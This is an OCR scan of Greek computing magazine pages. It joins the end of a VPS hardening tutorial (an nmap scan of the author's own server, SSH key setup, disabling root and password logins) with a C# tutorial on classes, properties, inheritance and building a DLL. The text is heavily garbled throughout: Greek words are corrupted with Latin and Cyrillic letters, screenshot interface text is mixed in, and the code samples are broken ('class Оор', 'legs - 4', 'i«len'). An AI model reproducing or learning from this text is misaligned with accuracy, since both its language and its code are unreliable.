(n.x., 20 χαρακτήρες). Επειδἠ εἶναι μάλλον απίθανο va το θυμόμαστε --αν εἶναι 
πράγματι кало τότε θα εἶναι npakrikà αδύνατο va ro θυμόμαστε--, προτείνουμε va 
το αποθηκεύσετε σε капою ασφαλὲς μέρος (π.χ., ως "Secure Note" στο LastPass). 
Θέλουμε εξάλλου ο χρήστης admin va εἶναι σε θέση να χρησιμοποιεί To sudo, οπότε 
τον βάζουμε στο ομώνυμο group: 


root@eyjafjallajokull:~# 
Adding user admin to group sudo 
Ας μεταβούμε ropa στο λογαριασμὀ rou admin: 
root@eyjafjallajokull:~# 
Το run a command as administrator (user "root"), use "sudo «command»". 


See "man sudo root" for details. 


root@kalivm: ~ 


File Edit View Search Terminal Help 


root@kalivm: ~# 
root@kalivm:~# nmap -sS -sV -T4 -p 1-65535 eyjafjallajokull.parabing.com 


Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 12:51 EET 
Nmap scan report for eyjafjallajokull.parabing.com (128.199.47.117) 
Host is up (0.079s latency). 
Not shown: 65531 closed ports 
STATE SERVICE "VERSION 
open smtp Postfix smtpd 
open http Apache httpd 2.4.7 ((Ubuntu)) 
open ssl/http Apache httpd 2.4.7 ((Ubuntu)) 
ssh (protocol 2.0) 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint 
cgi : 
Д 6. 64-unknown-linux-gnu 
NULL, 29, "SSH-2Y. 0-OpenSSH 6.6. 1p1Yx20Ubuntu-2ubuntu2 Vr 1n"); 
Service Info: Host: owncloud 


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 318.26 seconds 
rootékalivm: ~# Bi 


Σάρωση rou VPS µας µε то птар, апо éva VM µε Kali Linux. To iptables δεν εἶναι 
ρυθμισμένο και ro fail2ban δεν τρέχει, ONOTE εὐκολα αποκαλύπτονται тёсоєра διαφορετικά 
ports (για τρεις υπηρεσίες, αφού o Apache χρησιμοποιεί δύο ports). 
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root@kalivm: ~ 


File Edit View Search Terminal Help 


rootékalivm: ~# 
root@kalivm:~# nmap -sS -sV -T4 -p 1-65535 eyjafjallajokull.parabing.com 


Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-09 16:02 EET 
Nmap scan report for eyjafjallajokull.parabing.com (128.199.47.117) 
Host is up (0.075s latency). 

Not shown: 65534 filtered ports 

PORT STATE SERVICE VERSION 

443/tcp open ssl/http Apache httpd 2.4.7 ((Ubuntu)) 


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 7489.81 seconds 
root@kalivm: -# β 


Έχουν οριστεί κανόνες yia To iptables kai то fail2ban λειτουργεί. Αυτή 

τη φορά To nmap βρίσκει μόνο ro port 443 (ασφαλείς συνδέσεις HTTPS 
προς Tov Apache). Κανονικά θα έπρεπε να βρει και το ανοικτό port 49250 
(που χρησιμοποιεί ο OpenSSH server µας), υποψιαζόμαστε όμως ότι TO 
fail2ban δεν το αφήνει va κάνει τη δουλειά του. 


Θα φτιάξουμε τον κατάλογο ~/.ssh και μέσα του το αρχείο authorized. keys. Στον 
κατάλογο και στο αρχείο θα δώσουμε τα κατάλληλα δικαιώματα, ὥστε πρὀσβαση va 
ἐχει μόνον o admin: 


admin@eyjafjallajokull:~$ 
admin@eyjafjallajokull:~$ 
admin@eyjafjallajokull:~$ 
admin@eyjafjallajokull:~$ 
admin@eyjafjallajokull:~$ 


Ὅπως βλέπετε, µε ro nano avoi&aue το ~/.ssh/authorized_keys. Μέσα του μπορούμε 
να αντιγράψουµε Eva δημόσιο κλειδὶ για τον admin. Βεβαίως, υπάρχουν κι άλλοι 
τρόποι για να μεταφέρουμε το κλειδὶ του admin στο authorized keys. Όταν 
τελειώσουμε και μ' αυτή τη δουλειά, εγκαταλείπουµε το λογαριασμό rou admin κι 
ENIOTPEMOUHE σ' εκεἰνον TOU root: 


admin@eyjafjallajokull:~$ 
logout 
root@eyjafjallajokull:~# 


Στο σημείο autò δεν εἶναι καθόλου ἄσχημη ιδέα va βεβαιωθούμε OT! ἐχουμε 
δυνατότητα απομακρυσμένης σύνδεσης сто VPS, αλλά στο λογαριασμὀ rou admin. 
Και uia σημείωση: Ta fail2ban και unattended-upgrades εἶναι ρυθµισµένα WOTE va 
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στἐλνουν email στον root@localhost. Ίσως βολεύει καλύτερα va στέλνουν στον ad- 
min@localhost, οπὀτε κάντε τις απαραίτητες αλλαγές στα αρχεία /etc/fail2ban/jail. 
local και /etc/apt/apt.conf.d/5O0unattended-upgrades. 


Περαιτέρω ενίσχυση ασφάλειας yia το OpenSSH 


Εἶναι μᾶλλον περιττὸ να то επαναλάβουµε, αλλά επειδἠ θέλουμε προτείνουμε 
µια αλλαγή στον OpenSSH server ὥστε va δέχεται μόνο key-based κι Ox! pass- 
word-based authentication, av δεν εἶστε εξοικειωμένοι µε τα κλειδιά και τη χρήση 
τους διαβάστε οπωσδήποτε το σχετικὀ άρθρο στο http://deltahacker.gr/?p-13357. Па 
τη συνέχεια δουλεύουμε апо το λογαριασμό του admin, ἐτσι, για va τον συνηθίζουμε 
σιγἁ σιγἀ. Με δικαιώματα root, ανοίγουμε το αρχείο /etc/sshd_config: 

admin@eyjafjallajokull:~$ sudo nano /etc/ssh/sshd config 
Φροντίζουμε ὥστε va ισχύουν ra ακόλουθα: 

PermitRootLogin no 

PasswordAuthentication no 
Με την πρώτη oónyia To OpenSSH δεν δέχεται απομακρυσμένες συνδέσεις στο 
λογαριασμὀ Tou root, ανεξαρτήτως της μεθόδου authentication. Μόνος τρόπος για 
va συνδεόµαστε ως root απευθείας θα εἶναι µέσω της web console που παρέχει η 
DigitalOcean. Н δεύτερη oónyia απαγορεύει το password-based authentication, για 
όλους τους χρήστες. Πρακτικἁ, λοιπὸν, ὁπως εἰναι αυτή τη στιγμή το Droplet µας 
μπορούμε va συνδεόµαστε απομακρυσμένα μόνο στο λογαριασμὸ Tou admin και 


μόνο µε key-based authentication. Προκειμένου να ληφθούν υπόψη οι αλλαγές, 
δίνουμε: 


admin@eyjafjallajokull:~$ sudo service ssh restart 
ssh stop/waiting 

ssh start/running, process 3111 
admin@eyjafjallajokull:~$ 


Ἡδη ónog εἶναι ρυθμισμένος o OpenSSH server µας, εἶναι εξαιρετικἀ ασφαλἠς. 
Υπάρχουν ωστόσο και πολλὲς βελτιώσεις που θα μπορούσαμε να κάνουμε, WOTE 
να ενισχύσουµε περισσότερο την ασφάλειά του. Περὶ aurov, διαβάστε TO σχετικὀ 
арӨро στο τεύχος 040. Το тріто και τελευταἰο µέρος rou αφιερὠματός µας µπορείτε 
να το διαβάσετε online, στο site του περιοδικού, στη διεύθυνση http://deltahacker. 
gr/?p-13374. 
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public void Bark(int times) 


AA b 


by multiPetros 


Μετὰ ano τη βαρετή για κάποιους αναφορά στις βασικές προγραμματιστικὲς δομές, 
μπορούμε να προχωρήσουμε σε πιο σύνθετα και πιο ενδιαφέροντα ζητήματα. 
Θυμόσαστε που λέγαμε ότι η C£ αποτελεί µια κατεξοχἠν αντικειµενοστρεφἠ γλὠσσα 
προγραμματισμού; Σε auto το ἆρθρο θα ασχοληθούμε αποκλειστικἁ µε αυτή την 
πλευρά της και θα δούμε ra πιο ενδιαφἐροντα χαρακτηριστικἁ που προσφέρει. 


Ηνάπτυξη εφαρμογών σε CH για το .NET [μέρος Зо] 
Αα 


Στο ξεκἰνημα της σειράς διατυµπανἰσαμε бт! η C£ тра ре то παραπάνω To χαρακτη- 
PIOHO της αντικειμενοστρεφοὺς γλὠσσας. Μη νομίζετε OT! πρὀκειται για µια ψευδἠ 
υπερβολή, µε την οποία προσπαθήσαμε va σας δελεάσουμε. Στο παρὀν άρθρο θα 
εξετάσουμε τα αντικείμενα και το χειρισμό τους στη C£ και, στο τέλος, εἶμαστε oi- 
γουροι Ori θα ἐχετε πειστεί για την ειλικρἰνειἁ µας ;) Μάλιστα, επειδἠ μέχρι στιγµἠς 
το έχουμε παρακάνει µε τη θεωρία, θα περάσουμε αμέσως στο προκεἰµενο. 


Ὀλα σε... τάξεις 


Κάθε φορά που θέλουμε να δημιουργήσουμε éva αντικείµενο επιστρατεύουµε TOV 
τελεστή new. Ουσιαστικά, µε τη βοήθειά του κατασκευάζουµε Eva στιγμιότυπο της 
κλάσης στην onoia ανήκει το επιθυμητὀ αντικείµενο. Н δηµιουργία µιας κλάσης στη 
C# γίνεται µε τη λέξη κλειδὶ class: 


class Dog { 
} 


Στο παράδειγµα орісар= µια κλάση µε ro ὀνομα Dog, η οποία ωστόσο δεν περιλαμ- 
βάνει κανένα μέλος. Ката τα γνωστὰ, μέλη µιας κλάσης μπορούν να αποτελούν 
μεταβλητὲς ἡ και συναρτήσεις, που ονομάζονται μέθοδοι. Οι μεταβλητὲς ορἰζονται 
µε τον τρόπο που εξετάσαµε στο προηγούμενο μέρος της σειράς. Με την ἴδια λογικἠ 
δηλώνονται και οι µἐθοδοι, μόνο που εξαιτίας της πιο σύνθετης φύσης τους απαιτού- 
ута! μερικὰ παραπάνω στοιχεία. Δείτε τη γενική μορφή της δήλωσης µιας μεθόδου: 


τροποποιητής πρόσβασης τύπος επιστροφής όνοµα μεθόδου (τύπος παραμέτρου1 
όνοµα παραμέτρου! ..) 


Οι τροποποιητὲς πρὀσβασης εἶναι ἴδιοι µε αυτούς που χρησιμοποιούνται στις µετα- 
βλητὲς και δεν χρειάζεται να προσθέσουμε κάτι. Αν η μέθοδος δεν επιστρέφει τιμὲς, 
ο τύπος επιστροφἠς πρέπει να οριστεἰ σε void. Διαφορετικά, ο τύπος επιστροφἠς 
πρέπει να ταυτίζεται µε τον τύπο της επιστρεφὀµενης μεταβλητής. Ας εµπλουτἰσου- 
µε την κλάση Dog µε μερικὰ μέλη: 
class Dog { 
public int legs - 4 ; 
public void Bark(int times){ 


// code to make some noise ;) 


} 


Тора σίγουρα η κλάση µας εἶναι nio ολοκληρωμένη, av Kal εξακολουθεἰ va ἐχει 
αμφίβολη χρησιμότητα. Н πρὀσβαση στα μέλη ενὸς αντικειμένου πραγματοποιείται 
µε τον τελεστή της τελείας, σε αντίθεση µε την PHP στην οποία χρησιµοποιείται о 
τελεστής "βελάκι" (-», προέρχεται апо τη C++). Ας δούµε ropa τη δηµιουργία ενὸς 
αντικειμένου Dog, καθὼς και την πρὀσβαση στα μέλη του. 


Dog myDog = new Dog(); 
myDog.Bark(3); 
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int howManyLegs = myDog. legs; 
myDog.legs = 3; 


Ὅπως στις περισσότερες γλὠσσες αντικειμενοστρεφούς προγραμματισμού, για την 
αρχικοποίηση των αντικειμένων στη C# προσφἑρονται ειδικὲς µἐθοδοι που ονομά- 
ζονται constructors – τουλάχιστον στο χωριό του γράφοντα (Σ.τ.Ε. A, κι ἄλλος ano 
το Λευκαντὶ Ευβοίας!) Οι µἐθοδοι κατασκευἠς (constructors) ¿xouv το ἰδιο ὀνομα 
µε την κλάση, εἰναι δημόσια προσβάσιμες, δέχονται παραμέτρους, αλλά δεν EXOUV 
τύπο επιστροφἠς. Ας δούµε Eva παράδειγµα, εξελἰσσοντας περαιτέρω την κλάση 
Dog: 


class Оор{ 
public int legs; 
public Dog() { legs = 4; } 
public Dog(int legs) { this.legs = legs; } 
public void Bark(int times) { 
// code to bark for “times” times ;) 


} 


Στις παραπάνω γραμμές, εκτός ano τη δηµιουργία Tou constructor συναντάμε και 
τη λέξη κλειδὶ this. Με τη βοήθειά της μπορούμε να αναφερόμαστε στις µεταβλη- 
τὲς του εκάστοτε στιγμιότυπου της κλάσης. Στις ἰδιες γραμμὲς κὠδικα βλέπουμε κι 
ἑνα παράδειγµα υπερφόρτωσης (overloading). Να θυμίσουμε ὁτι η υπερφόρτωση 


%@ SharpDevelop - “Ж ш 
Ele Edit View Build Debug Search Analysis Tools Window Нер 

ааай h GX 
Projects ax 
laa 


sassen | sonedoig E 


[V] Create directory for solution 


Project will be created at C:\Users \user\desktop \MyLib\MyLib 


E Projects | Tools | 
[8 Errors |] Output | Task List | [8] Definition View |] Search Result 


Τέλος 


Н δηµιουργία της βιβλιοθήκης ξεκινάει επιλέγοντας 
την κατάλληλη µορφή project, μέσα апо το περι- 
βάλλον rou SharpDevelop. 
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αποτελεἰ EVA χαρακτηριστικὀ που απαντάται σε αρκετὲς γλὠσσες αντικειµενοστρε- 
Фобос προγραμματισμού. Н υπερφόρτωση επιτρέπει να ορίσουμε μεθόδους µε ro ἰδιο 
ὀνομα μέσα στην ἴδια κλάση, οι οποίες ὁμως θα πρέπει να διαφοροποιούνται EITE ως 
προς το πλήθος eiTe ως προς τον τύπο των παραμέτρων που δέχονται. Н Python και 
η PHP, παρ' oT! υλοποιούν χαρακτηριστικἁ TOU αντικειμενοστρεφούς проүрарраті- 
оной, δεν υποστηρίζουν την υπερφόρτωση μεθόδων. Αυτή την ἑλλειψη npoona- 
θούν να την αντισταθμἰσουν µε τη χρήση των προαιρετικὠν παραμέτρων, KTI που 
βελτιώνει την κατάσταση алла σε καμία περίπτωση δεν μπορεὶ να αντικαταστήσει 
πλήρως τη λειτουργικότητα της υπερφόρτωσης. Από την ἐκδοση 4.0 η C£ υποστη- 
ρίζει κι αυτἠ τις προαιρετικἐς παραμέτρους και, σε συνδυασμὸὀ pe TNV υπερφόρτωση, 
γίνεται ιδιαίτερα ευέλικτη γλὠσσα. Αξιοποιώντας τη δυνατότητα ορισμού προαιρετι- 
Kov παραμέτρων, oi δύο constructors που εἶδαμε προηγουμένως θα μπορούσαν να 
γραφτούν ως εξής: 


public Dog(int legs - 4) { this.legs - legs; } 


Έχοντας ορίσει kar' αυτόν τον τρόπο τη рёӨобо constructor, μπορούμε va δηµιουρ- 
YNOOUHE αντικείμενα της κλάσης Dog µε τους ακόλουθους τρόπους: 


// δηµιουργία σκύλου µε 4 πόδια (προεπιλογή) 
Dog ΠΥΡΟΡΙ = new Dog() ; 

// δηµιουργία σκύλου µε 6 πόδια 

Dog myDog2 = new Dog(6) ; 

// δημιουργία σκύλου µε 5 πόδια 

Dog myDog3 = new Dog(legs: 5) ; 


Παρατηρεἰστε ὁτι στο τρίτο παράδειγµα (δηµιουργία αντικειμένου myDog3) επιλέξα- 
µε va κατονομάσουµε την παράμετρο στην οποία δίνουμε τιµή. AUTH η δυνατότητα 
παρέχεται προς αποφυγἠ των πιθανών μπερδεμάτων, ὀταν µια μέθοδος ἐχει δύο ἡ 
περισσότερες προαιρετικἐς παραμέτρους. Αξιοποιώντας την μπορούμε να παραλεἰ- 
πουμε κάποιες апо τις προαιρετικἐς παραμέτρους, χωρίς va ανησυχούμε για το που 
θα καταλήξουν οι τιμὲς που δίνουμε. 


Φυσικἀ, εκτὸς ano τις μεθόδους δημιουργἰας, η CX προβλέπει και τις μεθόδους Ka- 
ταστροφἠς (destructors). To буора των συγκεκριμένων μεθόδων ξεκινά πάντα µε 
το χαρακτήρα ~ (tilde) και ката τα алла εἶναι πανομοιότυπο µε EKEIVO της εκάστοτε 
κλάσης. Ας επιστρἐιψουµε όμως στο παράδειγµα µε την κλάση Dog, για να δούμε 
στην πράξη rov ορισµὀ ενὸς destructor. Όπως θα Seite, η μέθοδος καταστροφἠς 
αξιοποιεί τη µἐθοδο γαυγἰσματος. Έτσι, κάθε фора nou θα καταστρέφουµε Eva αντι- 
κείμενο της κλάσης Dog, auró θα γαυγίζει δύο φορές. Κάπως ETO! πρέπει να εἰχαν 
προγραμματίσει και τα σκυλάκια στο παλιό αλλά αξέχαστο Command and Conquer ;) 
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public ~Dog() { 
Bark(2); 


Н άμεση πρὀσβαση στις μεταβλητές EVOG αντικειμένου μπορεί να αποτελἑσει το airio 
για Πολλά ὑπουλα bugs και, τέλος πάντων, εγκυμονεἰ σοβαρούς κινδύνους. AUTÒ 
το πρόβλημα µπορεἰ να αποφευχθεἰ µε τη χρήση κατάλληλων μεθόδων, οι οποίες 
τροποποιούν τις "εσωτερικές" στο αντικείµενο μεταβλητές ἡ επιστρἐφουν τις τιμὲς 
τους. Προφανώς, αυτὲς οι μέθοδοι χειρίζονται τις μεταβλητές του αντικειμένου µε 
τον προβλεπόμενο τρόπο kai η χρήση τους εξασφαλίζει τον ασφαλἠ χειρισμό των 
μεταβλητών. Av προγραμματἰσατε ποτὲ σε Java, εἰναι σίγουρο ὁτι θα γνωρίζετε τις 
ειδικἐς μεθόδους µε τα προθέματα get και set, που εἰτε επιστρέφουν eire τροποποι- 
οὖν τις τιμές των μεταβλητών ενὸς αντικειμένου. Н C υποστηρίζει τη χρήση αυτών 
των μεθόδων, αλλά προσφέρει και Evav ακόµα πιο χρήσιμο μηχανισμὀ. Αναφερόμα- 
στε στις λεγόμενες ιδιότητες (properties), που επιτρέπουν τη φαινομενικἁ ελεύθερη 
πρόσβαση στην τιμὴ µιας μεταβλητής, evo ταυτόχρονα προσφέρουν την ασφάλεια 
των μεθόδων get και set. Με τις ιδιότητες, λοιπὀν, απολαμβάνουμε τα οφἐλη των 
get και set, αλλά µε ἑναν τρόπο που δεν θυμίζει την κλήση μεθόδων. Ουσιαστικά, οι 
Ιδιότητες αποτελούν κατάλληλα κατασκευασμένες μεθόδους, oi οποίες δεν δέχονται 
παραμέτρους και χρησιμοποιούνται σαν μεταβλητές! Αυτές οι "ειδικές" μέθοδοι uno- 
pouv να περιλαμβάνουν ἑως και δύο μπλοκ κώδικα, апо τα οποία το Eva ξεκινά µε τη 
δεσμευμένη λέξη get και TO ἄλλο ue rr] λέξη set. Ας αφήσουμε ὁμωςτη θεωρία KI aq 
δούμε τον ορισμό µιας ιδιότητας στην πράξη: 


class Оор{ 


private int legs; 
// constructor, destructor and other methods 


public int Legs { 


set ( 

this.legs - value; 
} 
get { 

return this.legs; 
у 


} 


Στο παράδειγµα ορἰζουμε την ιδιότητα Legs nou, ὁπως βλέπετε, αναλαμβάνει то 
χειρισμὀ της μεταβλητής legs. Ακριβώς γι' αυτό To Aóyo, ο τύπος επιστροφἠς της HE- 
θόδου-ιδιότητας ταυτίζεται µε τον τύπο της μεταβλητής. Σημειώστε ὁτι η μεταβλητή 
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File Edit View Refactor Project Build Debug Search Analysis Tools Window Нер 
X X |) Qi |> 9 o | Defauttayout -A-BEZ 
MyClass.cs La Em 

Фф MyLib.ArrayUtils 


using System; 
using System.Collections.Generic; 


namespace MyLib( 

ΕΙ public class ArrayUtils[] 

= public int[] Reverse(int[] array){ 
int len - array.Length ; 
int[] reversedArray - new int[len] ; 
for(int i-0; i<len; i++){ 

reversedArray[i] = array[len - i - 1] ; 

} 


return reversedArray ; 


səsse j зәгпәйо 4 Ва 


Build finished successfully. (00:00:03.1517097) 


B Errors ] E] Output [2] Task List | E Definition View [m] Search Result | 
Τέλος In 5 «οἱ29 ch26 INS .: 


Н διαδικασία της μεταγλώττισης ξεκινά αµέσως μόλις 
επιλέξουμε το “χτίσιμο” του έργου. Τα μηνύματα του 
compiler εμφανίζονται στην περιοχή Output, του 
παραθύρου rou SharpDevelop. 


legs εἶναι private και δεν εκτίθεται στο περιβάλλον του αντικειμένου, ενώ η ιδιότητα 
Legs εἶναι public. Έτσι, η πρόσβαση στη μεταβλητὴἠ legs θα εἶναι δυνατή µὀνο µέσω 
της ιδιότητας Legs. Στον ορισμό της εν λόγω ιδιότητας έχουμε τοποθετήσει та µπλοκ 
set και get, που τροποποιούν ἡ επιστρἐφουν την τιμή της μεταβλητής. Στο μπλοκ set 
αξίζει να παρατηρήσετε τη χρήση της λέξης κλειδὶ value, η οποία αντιπροσωπεύει 
την οποιαδήποτε εισερχόμενη τιμή. Ας δούμε τώρα κι Eva παράδειγµα χρήσης της 
συγκεκριμένης ιδιότητας: 


Dog myDog = new Dog(); 
int myLegs = myDog.Legs; // λήψη της τιμής της μεταβλητής legs 
5; // καθορισμός τιμής στην μεταβλητή legs 


myDog.Legs 


Στην πρώτη γραμμή δημιουργούμε το αντικείµενο myDog και στη δεύτερη χρησι- 
μοποιούμε την ιδιότητα Legs, για να πάρουμε την τιμή της μεταβλητής legs. Με τη 
σύνταξη που χρησιμοποιούμε, θα πίστευε κανεὶς От! το αντικείµενο myDog περιλαμ- 
βάνει kànoia μεταβλητή τύπου *public* µε то буора Legs. Στην πραγματικότητα, 
όμως, το συγκεκριµένο αντικείµενο περιλαμβάνει µια μεταβλητή τύπου *private* 
και μάλιστα µε διαφορετικὀ ὀνομα (legs). Στην τρίτη γραμμή τροποποιούµε τη µετα- 
βλητή legs, κάνοντας και пал χρήση της ιδιότητας Legs. 
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Ελπίζουμε η ομοιότητα των ονομάτων Legs και legs va µη σας μπέρδεψε. Επιλέξα- 
µε αυτά τα ονόματα επειδἠ oi ιδιότητες ¿xouv ката παράδοση το ἰδιο буора µε τις 
αντίστοιχες μεταβλητὲς, διαφοροποιώντας μόνο το αρχικὀ γράμμα. Δεν θέλαμε va 
σας παιδέψουμµε :) 


Κληρονομικότητα 


Από µια γνήσια αντικειµενοστρεφή γλὠσσα δεν θα μπορούσε va λεἰπει το xapa- 
κτηριστικὀ της κληρονομικότητας. Н C£, ὁπως και η Java, υποστηρίζει την κληρο- 
νομικότητα апо ша γονικἠ κλάση προς τις κλάσεις-απογόνους (υποκλάσεις), που 
ονομάζεται κι απλἠ κληρονομικότητα. Па va δηλώσουμε оті µια κλάση αποτελεί 
επέκταση ἡ anóyovo µιας ἄλλης κλάσης, χρησιμοποιούμε το χαρακτήρα της ἄνω και 
κάτω τελείας. Συγκεκριµένα, ката τη δήλωση την κλάσης-απογόνου, αμέσως μετὰ 
το ὀνομά της τοποθετούμε το χαρακτήρα colon και στη συνέχεια το буора της yovi- 
κὴς κλάσης. Ας εξετάσουμε λοιπὀν την κλάση Labrador, η οποία αποτελεἰ απόγονο 
της κλάσης Dog: 


class Labrador : Dog { 
public void Bark(int times) { 


// code to imitate the voice of Labradors... 


) 


Н κλάση Labrador διαθέτει όλα τα μέλη της κλάσης Dog, ὁπως για παράδειγµα τη 
μεταβλητή legs µε την ομώνυμη ιδιότητα. 


Βιβλιοθήκες 


Апо τη συναναστροφἠ µας HE ric γλὠσσες προγραμματισμού Python και PHP έχουμε 
εξοικειωθεἰ µε την ιδέα της χρήσης και της δημιουργίας βιβλιοθηκών. О! βιβλιοθήκες 
δεν εἶναι τίποτε ἄλλο пара µια συλλογή апо αντικείμενα και μεθόδους, ἐτοιμες προς 
χρήση. Κατὰ την ορολογία της C£, οι συλλογές αυτού rou εἰδους δεν ονομάζονται 
βιβλιοθήκες αλλά namespaces (χώροι ονομάτων) και συγγενεύουν µε τα λεγόμενα 
πακέτα (packages) της Java. Па va ενσωματώσουμε µια κλάση σε Eva namespace, 
αρκεἰ va περικλείΐσουµε ολόκληρο τον ορισμὀ της µέσα σε brackets, να χρησιµοποι- 
ἠσουµε τη δεσμευμένη λέξη namespace και να δώσουμε Eva επιθυμητὀ ὀνομα. Ας 
δούμε για µια ακόμα фора τις κλάσεις Dog και Labrador, τις οποἰἱες θα υπάγουμε στο 
namespace ονόματι Animals. Στα ονόματα των namespace, όπως και σ' αυτά των 
κλάσεων, συνηθίζεται το прото γράμμα να εἶναι κεφαλαίο: 


namespace Animals { 
class Dog ( 
// κώδικας της κλάσης Dog 
} 


class Labrador : Dog { 


// κώδικας της κλάσης Labrador 
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P 


} 


Πα λόγους οργάνωσης και τάξης, Eva namespace μπορεἰ να χωρίζεται σε επιµέρους 
τμήματα. Στο προηγούμενο παράδειγµα θα μπορούσαμε va τοποθετήσουμµε τις κλά- 
σεις µας σε ἐναν υποχώρο TOU namespace Animals, με το ὄνομα Mammals (θηλαστι- 
ка). Κάτι τέτοιο θα μπορούσε να γίνει ως εξἠς: 


namespace Animas.Mammals { 
class Dog ( 
// κώδικας της Κλάσης Dog 
} 
class Labrador : Dog { 
// κώδικας της κλάσης Labrador 


) 


Па va χρησιμοποιήσουμε µια κλάση nou аук σε κἄποιο namespace, διαφορετικὀ 
апо αυτὸ στο οποίο ανήκει o κὠδικας που γράφουμε τη δεδομένη στιγμὴ, πρέπει va 
χρησιμοποιήσουμε την λέξη κλειδὶ using, ακολουθούμενη апо το буора του "ξένου" 
namespace. Πρακτικὰ, η λειτουργία της using εἶναι παρόμοια µε тп λειτουργία του 
import που χρησιμοποιούμε σε άλλες γλὠσσες για την εισαγωγἠ µια βιβλιοθήκης: 


using Animals.Mammals; 
namespace MyProgram { 
class Program ( 
public static void Main(string[] args) ( 
Dog aDog - new Dog(); 
aDog.Bark(); 


) 


Προφανώς, yia να χρησιμοποιήσουμε τις κλάσεις ενὸς namespace auró πρέπει να 
διαθέτει τον αντίστοιχο κὠδικα - eire στην nnyaia του µορφή eire µεταγλωττισμένο. 
Στη δεύτερη περίπτωση, ra µεταγλωττισμένα namespaces διατίθενται σε πακέτα 
DLL που περιλαμβάνουν κὠδικα CIL!. Αυτά τα πακέτα орос δεν xouv каша σχέση 
µε та γνωστά DLL που συνοδεύουν τα Windows και τα οποία περιέχουν binary code. 


Δημιουργία βιβλιοθήκης 

Н δηµιουργία µιας βιβλιοθήκης µέσα апо το περιβάλλον rou SharpDevelop εἶναι na- 
νεύκολη υπόθεση. Αφού ανοἰξουµε το περιβάλλον ανάπτυξης, επιλἐγουµε το "New 
1. Περισσότερα ү! αυτό το εἶδος κὠδικα εἶχαμε αναφἑρει στο прото µέρος της σειράς. 
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Solution" ano το μενού File και апо την αριστερἠ περιοχἠ του παραθύρου εμφα- 
vietai, κἀνουμε κλικ στον κόμβο C£. Κατόπιν, στο δεξιὸ τµήµα του παραθύρου 
επιλέγουμε To "Class Library". Στη συνέχεια арке! να ορίσουμε TO ὀνομα και την 
τοποθεσἰα αποθήκευσης της βιβλιοθήκης µας. Όταν πατήσουµε το κουμπἰ Create 
μεταφερόμαστε στο περιβάλλον συγγραφής, ὀπου μπορούμε ν΄ αρχίσουμε την ou- 
σιαστικἠ δουλειά. Όπως θα δείτε, στο ξεκίνημα rou κὠδικα προστίθενται апо προς- 
πιλογἡ κάποιες βιβλιοθήκες του .Net. Μπορούμε να γράψουμε τον κὠδικά µας λίγες 
γραμμές χαμηλότερα. Εμεἰὶς αφαιρέσαμε το τµήµα κὠδικα MyClass, που εἶχε προστε- 
θεἰ αυτόματα, και δημιουργήσαμε µια κλάση µε буора ArrayUtils. Μέσα σε αυτή την 
κλάση γράψαμε µια µἐθοδο που "αναποδογυρίζει" τα στοιχεία ενός πίνακα, καθώς 
και µια κλάση ονόματι Calcs. Μέσα στη δεύτερη κλάση δημιουργήσαμε µια µἐθοδο 
που υπολογίζει το τετράγωνο του δοσμένου αριθμού. Ας αφήσουμε τις περιγραφὲς 
κι ας δούµε τον κὠδικα που γράψαμε. 


namespace MyLib { 
public class ArrayUtils { 
public int[] Reverse(int[] array) { 
int len = array.Length; 
int[] reversedArray = new int[len]; 
for(int 1=0; i«len; i++) { 
reversedArray[i] = array[len - i - 1]; 


} 


return reversedArray; 


} 
public class Calcs { 
public int Squared(int number) { 


return number * number; 


} 


О παραπάνω Kwdikdc δεν EXE! κάτι το ιδιαίτερο σε σχἐση µε оса ἐχουμε πει ως тора 
και δεν χρειάζεται va σπαταλήσουµε χρόνο yia την εξἐτασἠ rou. Θα προχωρήσουμε 
απευθείας στη διαδικασἰα της µεταγλώττισης της βιβλιοθήκης µας. Па να πετύχουμε 
κάτι τέτοιο, μεταβαίνουμε στο μενού Build κι επιλέγουμε eire ro "Build Solution" eire 
το "Build MyLib". Σε auth τη φάση, βλέπετε, καθώς δεν έχουμε δημιουργήσει πάνω 
ano Eva Project µέσα στο ἰδιο Solution, οι δύο επιλογὲς εἶναι πρακτικἁ ισοδύναμες. 
Н μεταγλώττιση θα ξεκινήσει αμέσως κι εφόσον δεν υπάρχουν συντακτικά σφἀλ- 
рата στον κὠδικα, θα εμφανιστεί Eva μήνυμα επιτυχίας στην περιοχή Output του 
παραθύρου του SharpDevelop. Н βιβλιοθήκη µας μόλις δημιουργήθηκε! Μπορούμε 
να βρούμε το σχετικὀ DLL μέσα στον κατάλογο \bin\Debug, στην τοποθεσία ὀπου 
επιλἐξαµε για την αποθήκευση rou Project. Όπως δηλώνει то буора του φακέλου, 
η βιβλιοθήκη που θα βρούμε eksi δεν ἐχει την τελικἠ µορφή (προς διανομὴ), καθώς 
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ενσωματώνει κὠδικα και δεδοµένα που διευκολύνουν то debug. Па va δηµιουρ- 
γήσουµε την τελικἠ εκδοχἠ της βιβλιοθήκης, πρέπει va μεταβούμε στο μενού Set 
Configuration evtoc του μενού Build, και va επιλἐξουµε To Release avri Tou προεπι- 
λεγμένου Debug. Μετά, арке! να πραγματοποιήσουμε µια εκ νέου μεταγλώττιση. Н 
τελική µορφή της βιβλιοθήκης µας Ва βρίσκεται στον κατάλογο \bin\Release, στην 
τοποθεσία αποθήκευσης rou Project. 


Στο επὀμενο τεύχος θα ξεκινήσουμε την κατασκευή ολόκληρων προγραμμάτων, 
στηριζόμενοι στη θεωρία nou παρουσιάσαµε μέχρι тора. Ката τα γνωστά, θα σας 
προτείναμε να µην περιμένετε апраүо αλλά να ξεκινήσετε апо тора та δικἁ σας 
πειράματα. Εἱμαστε σίγουροι ἄλλωστε бт! όλο και κἄποια ιδέα θα ἐχετε προς υλο- 
ποίηση. 


Αρχική Κοινή χρήση Προβολή 


~ ^ |» Mylib > MyLib » bin » Release Αναζήτηση: Release 


ἊΣ Αγαπημένα 
BE Επιφάνεια εργασίας 
I Στοιχεία λήψης 
El Πρόσφατες θέσεις 


MyLib.dll 


09 Βιβλιοθήκες 
Е Βίντεο 
[3 Έγγραφα 
fi) Εικόνες 
αἲ Μουσική 


«8 Οικιακή ομάδα 


180 Υπολογιστής 
в Τοπικός δίσκος (С:) 


Фа Δίκτυο 


1 στοιχείο 


To DLL µε τη βιβλιοθήκη µας μοιάζει µε ra κλασσικά 
